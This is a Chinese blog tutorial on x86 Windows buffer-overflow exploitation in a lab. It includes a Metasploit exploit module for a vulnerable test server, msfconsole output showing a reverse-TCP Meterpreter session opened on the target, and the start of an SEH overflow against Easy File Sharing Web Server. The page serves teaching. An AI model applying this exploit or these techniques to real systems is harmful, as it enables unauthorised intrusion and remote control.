1509 lines
91 KiB
HTML
1509 lines
91 KiB
HTML
|
<!DOCTYPE html>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<html class="theme-next gemini use-motion" lang="zh-Hans">
|
|||
|
<head><meta name="generator" content="Hexo 3.8.0">
|
|||
|
<meta charset="UTF-8">
|
|||
|
<meta http-equiv="X-UA-Compatible" content="IE=edge">
|
|||
|
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
|
|||
|
<meta name="theme-color" content="#222">
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<meta http-equiv="Cache-Control" content="no-transform">
|
|||
|
<meta http-equiv="Cache-Control" content="no-siteapp">
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">
|
|||
|
|
|||
|
<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">
|
|||
|
|
|||
|
|
|||
|
<link rel="apple-touch-icon" sizes="180x180" href="/images/hackerrank.png?v=5.1.4">
|
|||
|
|
|||
|
|
|||
|
<link rel="icon" type="image/png" sizes="32x32" href="/images/hackerrank.png?v=5.1.4">
|
|||
|
|
|||
|
|
|||
|
<link rel="icon" type="image/png" sizes="16x16" href="/images/hackerrank.png?v=5.1.4">
|
|||
|
|
|||
|
|
|||
|
<link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<meta name="keywords" content="二进制,Windows,漏洞,">
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<meta name="description" content="这部分是对Window x86平台下的几个典型漏洞利用方式的介绍,从最基础的、没有开启任何保护的漏洞程序入手,然后开启GS,最后通过rop绕过DEP。 0x00 漏洞利用开发简介(1)需要什么 Immunity Debugger -Download Mona.py -Download Metasploit框架-下载 靶机–Windows XP sp3 函数调用与栈:调用、返回 寄存器与函数">
|
|||
|
<meta name="keywords" content="二进制,Windows,漏洞">
|
|||
|
<meta property="og:type" content="article">
|
|||
|
<meta property="og:title" content="x86-basic 漏洞利用">
|
|||
|
<meta property="og:url" content="https://cool-y.github.io/2019/07/10/x86basic/index.html">
|
|||
|
<meta property="og:site_name" content="混元霹雳手">
|
|||
|
<meta property="og:description" content="这部分是对Window x86平台下的几个典型漏洞利用方式的介绍,从最基础的、没有开启任何保护的漏洞程序入手,然后开启GS,最后通过rop绕过DEP。 0x00 漏洞利用开发简介(1)需要什么 Immunity Debugger -Download Mona.py -Download Metasploit框架-下载 靶机–Windows XP sp3 函数调用与栈:调用、返回 寄存器与函数">
|
|||
|
<meta property="og:locale" content="zh-Hans">
|
|||
|
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562741903/%E6%8D%95%E8%8E%B7.png">
|
|||
|
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742079/%E6%8D%95%E8%8E%B71.png">
|
|||
|
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742316/%E5%9B%BE%E7%89%871.png">
|
|||
|
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742366/%E5%9B%BE%E7%89%872.png">
|
|||
|
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742444/%E5%9B%BE%E7%89%873.png">
|
|||
|
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742486/%E5%9B%BE%E7%89%874.png">
|
|||
|
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742543/%E5%9B%BE%E7%89%875.png">
|
|||
|
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742622/%E5%9B%BE%E7%89%876.png">
|
|||
|
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742623/%E5%9B%BE%E7%89%877.png">
|
|||
|
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742685/%E5%9B%BE%E7%89%878.png">
|
|||
|
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742686/%E5%9B%BE%E7%89%879.png">
|
|||
|
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742794/%E5%9B%BE%E7%89%8710.png">
|
|||
|
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742793/%E5%9B%BE%E7%89%8711.png">
|
|||
|
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744120/11.png">
|
|||
|
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744240/231.png">
|
|||
|
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744461/%E5%9B%BE%E7%89%8712.png">
|
|||
|
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744518/%E6%8D%9511%E8%8E%B7.png">
|
|||
|
<meta property="og:updated_time" content="2019-07-10T09:02:29.682Z">
|
|||
|
<meta name="twitter:card" content="summary">
|
|||
|
<meta name="twitter:title" content="x86-basic 漏洞利用">
|
|||
|
<meta name="twitter:description" content="这部分是对Window x86平台下的几个典型漏洞利用方式的介绍,从最基础的、没有开启任何保护的漏洞程序入手,然后开启GS,最后通过rop绕过DEP。 0x00 漏洞利用开发简介(1)需要什么 Immunity Debugger -Download Mona.py -Download Metasploit框架-下载 靶机–Windows XP sp3 函数调用与栈:调用、返回 寄存器与函数">
|
|||
|
<meta name="twitter:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562741903/%E6%8D%95%E8%8E%B7.png">
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<script type="text/javascript" id="hexo.configurations">
|
|||
|
var NexT = window.NexT || {};
|
|||
|
var CONFIG = {
|
|||
|
root: '/',
|
|||
|
scheme: 'Gemini',
|
|||
|
version: '5.1.4',
|
|||
|
sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
|
|||
|
fancybox: true,
|
|||
|
tabs: true,
|
|||
|
motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
|
|||
|
duoshuo: {
|
|||
|
userId: '0',
|
|||
|
author: '博主'
|
|||
|
},
|
|||
|
algolia: {
|
|||
|
applicationID: '',
|
|||
|
apiKey: '',
|
|||
|
indexName: '',
|
|||
|
hits: {"per_page":10},
|
|||
|
labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
|
|||
|
}
|
|||
|
};
|
|||
|
</script>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<link rel="canonical" href="https://cool-y.github.io/2019/07/10/x86basic/">
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<title>x86-basic 漏洞利用 | 混元霹雳手</title>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</head>
|
|||
|
|
|||
|
<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<div class="container sidebar-position-left page-post-detail">
|
|||
|
<div class="headband"></div>
|
|||
|
|
|||
|
<header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
|
|||
|
<div class="header-inner"><div class="site-brand-wrapper">
|
|||
|
<div class="site-meta ">
|
|||
|
|
|||
|
|
|||
|
<div class="custom-logo-site-title">
|
|||
|
<a href="/" class="brand" rel="start">
|
|||
|
<span class="logo-line-before"><i></i></span>
|
|||
|
<span class="site-title">混元霹雳手</span>
|
|||
|
<span class="logo-line-after"><i></i></span>
|
|||
|
</a>
|
|||
|
</div>
|
|||
|
|
|||
|
<p class="site-subtitle">多得是,你不知道的事</p>
|
|||
|
|
|||
|
</div>
|
|||
|
|
|||
|
<div class="site-nav-toggle">
|
|||
|
<button>
|
|||
|
<span class="btn-bar"></span>
|
|||
|
<span class="btn-bar"></span>
|
|||
|
<span class="btn-bar"></span>
|
|||
|
</button>
|
|||
|
</div>
|
|||
|
</div>
|
|||
|
|
|||
|
<nav class="site-nav">
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<ul id="menu" class="menu">
|
|||
|
|
|||
|
|
|||
|
<li class="menu-item menu-item-home">
|
|||
|
<a href="/" rel="section">
|
|||
|
|
|||
|
<i class="menu-item-icon fa fa-fw fa-home"></i> <br>
|
|||
|
|
|||
|
首页
|
|||
|
</a>
|
|||
|
</li>
|
|||
|
|
|||
|
|
|||
|
<li class="menu-item menu-item-about">
|
|||
|
<a href="/about/" rel="section">
|
|||
|
|
|||
|
<i class="menu-item-icon fa fa-fw fa-user"></i> <br>
|
|||
|
|
|||
|
关于
|
|||
|
</a>
|
|||
|
</li>
|
|||
|
|
|||
|
|
|||
|
<li class="menu-item menu-item-tags">
|
|||
|
<a href="/tags/" rel="section">
|
|||
|
|
|||
|
<i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
|
|||
|
|
|||
|
标签
|
|||
|
</a>
|
|||
|
</li>
|
|||
|
|
|||
|
|
|||
|
<li class="menu-item menu-item-categories">
|
|||
|
<a href="/categories/" rel="section">
|
|||
|
|
|||
|
<i class="menu-item-icon fa fa-fw fa-th"></i> <br>
|
|||
|
|
|||
|
分类
|
|||
|
</a>
|
|||
|
</li>
|
|||
|
|
|||
|
|
|||
|
<li class="menu-item menu-item-archives">
|
|||
|
<a href="/archives/" rel="section">
|
|||
|
|
|||
|
<i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
|
|||
|
|
|||
|
归档
|
|||
|
</a>
|
|||
|
</li>
|
|||
|
|
|||
|
|
|||
|
<li class="menu-item menu-item-bookmarks">
|
|||
|
<a href="/bookmarks/" rel="section">
|
|||
|
|
|||
|
<i class="menu-item-icon fa fa-fw fa-map"></i> <br>
|
|||
|
|
|||
|
书签
|
|||
|
</a>
|
|||
|
</li>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<li class="menu-item menu-item-search">
|
|||
|
|
|||
|
<a href="javascript:;" class="popup-trigger">
|
|||
|
|
|||
|
|
|||
|
<i class="menu-item-icon fa fa-search fa-fw"></i> <br>
|
|||
|
|
|||
|
搜索
|
|||
|
</a>
|
|||
|
</li>
|
|||
|
|
|||
|
</ul>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<div class="site-search">
|
|||
|
|
|||
|
<div class="popup search-popup local-search-popup">
|
|||
|
<div class="local-search-header clearfix">
|
|||
|
<span class="search-icon">
|
|||
|
<i class="fa fa-search"></i>
|
|||
|
</span>
|
|||
|
<span class="popup-btn-close">
|
|||
|
<i class="fa fa-times-circle"></i>
|
|||
|
</span>
|
|||
|
<div class="local-search-input-wrapper">
|
|||
|
<input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
|
|||
|
</div>
|
|||
|
</div>
|
|||
|
<div id="local-search-result"></div>
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</div>
|
|||
|
|
|||
|
</nav>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</div>
|
|||
|
</header>
|
|||
|
|
|||
|
<main id="main" class="main">
|
|||
|
<div class="main-inner">
|
|||
|
<div class="content-wrap">
|
|||
|
<div id="content" class="content">
|
|||
|
|
|||
|
|
|||
|
<div id="posts" class="posts-expand">
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<div class="post-block">
|
|||
|
<link itemprop="mainEntityOfPage" href="https://cool-y.github.io/2019/07/10/x86basic/">
|
|||
|
|
|||
|
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
|
|||
|
<meta itemprop="name" content="Cool-Y">
|
|||
|
<meta itemprop="description" content>
|
|||
|
<meta itemprop="image" content="/images/avatar.png">
|
|||
|
</span>
|
|||
|
|
|||
|
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
|
|||
|
<meta itemprop="name" content="混元霹雳手">
|
|||
|
</span>
|
|||
|
|
|||
|
|
|||
|
<header class="post-header">
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<h1 class="post-title" itemprop="name headline">x86-basic 漏洞利用</h1>
|
|||
|
|
|||
|
|
|||
|
<div class="post-meta">
|
|||
|
<span class="post-time">
|
|||
|
|
|||
|
<span class="post-meta-item-icon">
|
|||
|
<i class="fa fa-calendar-o"></i>
|
|||
|
</span>
|
|||
|
|
|||
|
<span class="post-meta-item-text">发表于</span>
|
|||
|
|
|||
|
<time title="创建于" itemprop="dateCreated datePublished" datetime="2019-07-10T17:00:36+08:00">
|
|||
|
2019-07-10
|
|||
|
</time>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</span>
|
|||
|
|
|||
|
|
|||
|
<span class="post-category">
|
|||
|
|
|||
|
<span class="post-meta-divider">|</span>
|
|||
|
|
|||
|
<span class="post-meta-item-icon">
|
|||
|
<i class="fa fa-folder-o"></i>
|
|||
|
</span>
|
|||
|
|
|||
|
<span class="post-meta-item-text">分类于</span>
|
|||
|
|
|||
|
|
|||
|
<span itemprop="about" itemscope itemtype="http://schema.org/Thing">
|
|||
|
<a href="/categories/二进制/" itemprop="url" rel="index">
|
|||
|
<span itemprop="name">二进制</span>
|
|||
|
</a>
|
|||
|
</span>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</span>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<span id="/2019/07/10/x86basic/" class="leancloud_visitors" data-flag-title="x86-basic 漏洞利用">
|
|||
|
<span class="post-meta-divider">|</span>
|
|||
|
<span class="post-meta-item-icon">
|
|||
|
<i class="fa fa-eye"></i>
|
|||
|
</span>
|
|||
|
|
|||
|
<span class="post-meta-item-text">阅读次数:</span>
|
|||
|
|
|||
|
<span class="leancloud-visitors-count"></span>
|
|||
|
</span>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<div class="post-wordcount">
|
|||
|
|
|||
|
|
|||
|
<span class="post-meta-item-icon">
|
|||
|
<i class="fa fa-file-word-o"></i>
|
|||
|
</span>
|
|||
|
|
|||
|
<span title="字数统计">
|
|||
|
2.2k 字
|
|||
|
</span>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<span class="post-meta-divider">|</span>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<span class="post-meta-item-icon">
|
|||
|
<i class="fa fa-clock-o"></i>
|
|||
|
</span>
|
|||
|
|
|||
|
<span title="阅读时长">
|
|||
|
11 分钟
|
|||
|
</span>
|
|||
|
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</div>
|
|||
|
</header>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<div class="post-body" itemprop="articleBody">
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<p>这部分是对Window x86平台下的几个典型漏洞利用方式的介绍,从最基础的、没有开启任何保护的漏洞程序入手,然后开启GS,最后通过rop绕过DEP。</p>
|
|||
|
<h1 id="0x00-漏洞利用开发简介"><a href="#0x00-漏洞利用开发简介" class="headerlink" title="0x00 漏洞利用开发简介"></a>0x00 漏洞利用开发简介</h1><p>(1)需要什么</p>
|
|||
|
<ul>
|
|||
|
<li>Immunity Debugger -<a href="http://debugger.immunityinc.com/ID_register.py" target="_blank" rel="noopener">Download</a></li>
|
|||
|
<li>Mona.py -<a href="https://github.com/corelan/mona" target="_blank" rel="noopener">Download</a></li>
|
|||
|
<li>Metasploit框架-<a href="https://www.metasploit.com/" target="_blank" rel="noopener">下载</a></li>
|
|||
|
<li>靶机–Windows XP sp3</li>
|
|||
|
</ul>
|
|||
|
<p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562741903/%E6%8D%95%E8%8E%B7.png" alt></p>
|
|||
|
<ul>
|
|||
|
<li>函数调用与栈:调用、返回</li>
|
|||
|
<li>寄存器与函数栈帧:ESP、EBP</li>
|
|||
|
<li>函数栈帧:局部变量、栈帧状态值、函数返回地址</li>
|
|||
|
<li>函数调用约定与相关指令:参数传递方式、参数入栈顺序、恢复堆栈平衡的操作</li>
|
|||
|
</ul>
|
|||
|
<p>(2)函数调用的汇编过程</p>
|
|||
|
<ol>
|
|||
|
<li><p>示例程序</p>
|
|||
|
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">charname[] = <span class="string">"1234567"</span>;</span><br><span class="line">voidfunc(<span class="keyword">int</span> a, <span class="keyword">int</span> b, <span class="keyword">int</span> c)</span><br><span class="line">{</span><br><span class="line"> charbuf[<span class="number">8</span>];</span><br><span class="line"> <span class="built_in">strcpy</span>(buf, name);</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
|
|||
|
</li>
|
|||
|
<li><p>汇编过程</p>
|
|||
|
</li>
|
|||
|
</ol>
|
|||
|
<ul>
|
|||
|
<li>PUSH c, PUSH b, PUSH a</li>
|
|||
|
<li>CALL address of func【保存返回地址;跳转】</li>
|
|||
|
<li>MOV ebp, esp</li>
|
|||
|
<li>PUSH ebp</li>
|
|||
|
<li>SUB esp, 0x40</li>
|
|||
|
<li>创建局部变量,4个字节为一组</li>
|
|||
|
<li>do something</li>
|
|||
|
<li>add esp, 0x40</li>
|
|||
|
<li>pop ebp</li>
|
|||
|
<li>RETN【弹出返回地址,跳转】</li>
|
|||
|
</ul>
|
|||
|
<ol start="3">
|
|||
|
<li>栈帧结构<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742079/%E6%8D%95%E8%8E%B71.png" alt></li>
|
|||
|
</ol>
|
|||
|
<h1 id="0x01-简单栈溢出"><a href="#0x01-简单栈溢出" class="headerlink" title="0x01 简单栈溢出"></a>0x01 简单栈溢出</h1><blockquote>
|
|||
|
<p><strong>目标程序:</strong><br><a href="http://redstack.net/blog/static/uploads/2008/01/bof-server.c" target="_blank" rel="noopener">bof-server source code</a><br><a href="http://redstack.net/blog/wp-content/uploads/2008/01/bof-server.exe" target="_blank" rel="noopener">bof-server binary for Windows</a><br><strong>usage:</strong><br>服务端<br><code>bof-server.exe 4242</code><br>客户端<br><code>telnet localhost 4242</code><br><code>version</code><br><code>bof-server v0.01</code><br><code>quit</code></p>
|
|||
|
</blockquote>
|
|||
|
<h2 id="漏洞点"><a href="#漏洞点" class="headerlink" title="漏洞点"></a>漏洞点</h2><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742316/%E5%9B%BE%E7%89%871.png" alt></p>
|
|||
|
<p><strong>产生崩溃</strong><br>将输出的1024个A发送给靶机程序<br><figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">python -c <span class="string">"print('A' * 1024)"</span></span><br><span class="line">telnet <span class="number">192.168</span><span class="number">.64</span><span class="number">.138</span> <span class="number">4242</span></span><br></pre></td></tr></table></figure></p>
|
|||
|
<p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742366/%E5%9B%BE%E7%89%872.png" alt></p>
|
|||
|
<h2 id="关闭防御措施"><a href="#关闭防御措施" class="headerlink" title="关闭防御措施"></a>关闭防御措施</h2><p>使用<strong>PESecurity</strong>检查可执行文件本身的防御措施开启情况<br>注意设置:Set-ExecutionPolicyUnrestricted</p>
|
|||
|
<p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742444/%E5%9B%BE%E7%89%873.png" alt></p>
|
|||
|
<p><strong>ASLR和DEP</strong><br>ASLR在xp下不用考虑,DEP可通过修改boot.ini中的nonexecute来完成(AlwaysOff、OptOut)<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742486/%E5%9B%BE%E7%89%874.png" alt></p>
|
|||
|
<h2 id="整体的攻击流程:"><a href="#整体的攻击流程:" class="headerlink" title="整体的攻击流程:"></a>整体的攻击流程:</h2><ol>
|
|||
|
<li>任意非00的指令覆盖buffer和EBP</li>
|
|||
|
<li>从程序已经加载的dll中获取他们的jmp esp指令地址。</li>
|
|||
|
<li>使用jmp esp的指令地址覆盖ReturnAddress</li>
|
|||
|
<li>从下一行开始填充Shellcode<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742543/%E5%9B%BE%E7%89%875.png" alt></li>
|
|||
|
</ol>
|
|||
|
<h2 id="确定溢出点的位置"><a href="#确定溢出点的位置" class="headerlink" title="确定溢出点的位置"></a>确定溢出点的位置</h2><ol>
|
|||
|
<li><p>生成字符序列 <strong>pattern_create.rb</strong><br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742622/%E5%9B%BE%E7%89%876.png" alt></p>
|
|||
|
</li>
|
|||
|
<li><p>发送给目标程序<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742623/%E5%9B%BE%E7%89%877.png" alt></p>
|
|||
|
</li>
|
|||
|
<li><p>计算偏移量 <strong>pattern_offset.rb</strong><br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742685/%E5%9B%BE%E7%89%878.png" alt></p>
|
|||
|
</li>
|
|||
|
<li><p>确定payload结构<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742686/%E5%9B%BE%E7%89%879.png" alt></p>
|
|||
|
</li>
|
|||
|
</ol>
|
|||
|
<h2 id="寻找jmp-esp跳板"><a href="#寻找jmp-esp跳板" class="headerlink" title="寻找jmp esp跳板"></a>寻找jmp esp跳板</h2><ol>
|
|||
|
<li>OD附加进程看一下服务器加载了哪些模块<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742794/%E5%9B%BE%E7%89%8710.png" alt></li>
|
|||
|
<li>查找JMP ESP指令的地址<br>在这里选择了ws2_32.dll作为对象,通过Metasploit的msfbinscan进行搜索<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742793/%E5%9B%BE%E7%89%8711.png" alt></li>
|
|||
|
</ol>
|
|||
|
<h2 id="自动化攻击"><a href="#自动化攻击" class="headerlink" title="自动化攻击"></a>自动化攻击</h2><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">require</span> <span class="string">'msf/core'</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Metasploit3</span> < Msf::Exploit::<span class="title">Remote</span></span></span><br><span class="line"> Rank = NormalRanking</span><br><span class="line"> <span class="keyword">include</span> Msf::Exploit::Remote::Tcp</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">initialize</span><span class="params">(info = {})</span></span></span><br><span class="line"> <span class="keyword">super</span>(update_info(info,</span><br><span class="line"> <span class="string">'Name'</span> => <span class="string">'Stack Based Buffer Overflow Example'</span>,</span><br><span class="line"> <span class="string">'Description'</span> => <span class="string">%q{</span></span><br><span class="line"><span class="string"> Stack Based Overflow Example Application Exploitation Module</span></span><br><span class="line"><span class="string"> }</span>,</span><br><span class="line"> <span class="string">'Platform'</span> => <span class="string">'Windows'</span>,</span><br><span class="line"> <span class="string">'Author'</span> => <span class="string">'yanhan'</span>,</span><br><span class="line"></span><br><span class="line"> <span class="string">'Payload'</span> =></span><br><span class="line"> {</span><br><span class="line"> <span class="string">'space'</span> => <span class="number">400</span>,</span><br><span class="line"> <span class="string">'BadChars'</span> => <span class="string">"\x00\xff"</span></span><br><span class="line"> },</span><br><span class="line"> <span class="string">'Targets'</span> =></span><br><span class="line"> [</span><br><span class="line"> [</span><br><span class="line"> <span class="string">'Windows XP SP3'</span>,</span><br><span class="line"> {<span class="string">'Ret'</span> => <span class="number">0x71a22b53</span>, <span class="string">'Offset'</span> => <span class="number">520</span>}</span><br><span class="line"> ]</span><br><span class="line"> ],</span><br><span class="line"> <span class="string">'DisclosureDate'</span> => <span class="string">'2019-05-25'</span></span><br><span class="line"> ))</span><br><span class="line"> <span c
|
|||
|
<figure class="highlight subunit"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">msf5 > use exploit/windows/yanhan/bof_attack</span><br><span class="line">msf5 exploit(windows/yanhan/bof_attack) > set rhosts 192.168.31.114</span><br><span class="line">rhosts => 192.168.31.114</span><br><span class="line">msf5 exploit(windows/yanhan/bof_attack) > set rport 1000</span><br><span class="line">rport => 1000</span><br><span class="line">msf5 exploit(windows/yanhan/bof_attack) > exploit</span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 192.168.31.84:4444</span><br><span class="line">[*] Sending stage (179779 bytes) to 192.168.31.114</span><br><span class="line">[*] Meterpreter session 1 opened (192.168.31.84:4444 -> 192.168.31.114:1062) at 2019<span class="string">-07</span><span class="string">-10</span> 16:38:51 <span class="string">+0800</span></span><br><span class="line"></span><br><span class="line">meterpreter > ls</span><br><span class="line">Listing: C:\Documents and Settings\Administrator</span><br><span class="line">================================================</span><br><span class="line"></span><br><span class="line">Mode Size Type Last modified Name</span><br><span class="line">---- ---- ---- ------------- ----</span><br><span class="line">40555/r-xr-xr-x 0 dir 2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span> Application Data</span><br><span class="line">40777/rwxrwxrwx 0 dir 2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span> Cookies</span><br><span class="line">40555/r-xr-xr-x 0 dir 2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span> Favorites</span><br><span class="line">40777/rwxrwxrwx 0 dir 2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span> Local Settings</span><br><span class="line">40555/r-xr-xr-x 0 dir 2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span> My Documents</span><br><span class="line">100666/rw-rw-rw- 1048576 fil 2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span> NTUSER.DAT</span><br><span class="line">40777/rwxrwxrwx 0 dir 2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span> NetHood</span><br><span class="line">40777/rwxrwxrwx 0 dir 2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span> PrintHood</span><br><span class="line">40555/r-xr-xr-x 0 dir 201
|
|||
|
<h1 id="0x02-基于SEH的栈溢出"><a href="#0x02-基于SEH的栈溢出" class="headerlink" title="0x02 基于SEH的栈溢出"></a>0x02 基于SEH的栈溢出</h1><blockquote>
|
|||
|
<p><strong>目标程序</strong> Easy File Sharing Web Server 7.2</p>
|
|||
|
<p><strong>漏洞点</strong><br>在处理请求时存在漏洞——一个恶意的请求头部(HEAD或GET)就可以引起缓冲区溢出,从而改写SEH链的地址。</p>
|
|||
|
<p><strong>利用seh</strong><br>填充物+nseh+ seh(pop popretn指令序列地址)+shellcode</p>
|
|||
|
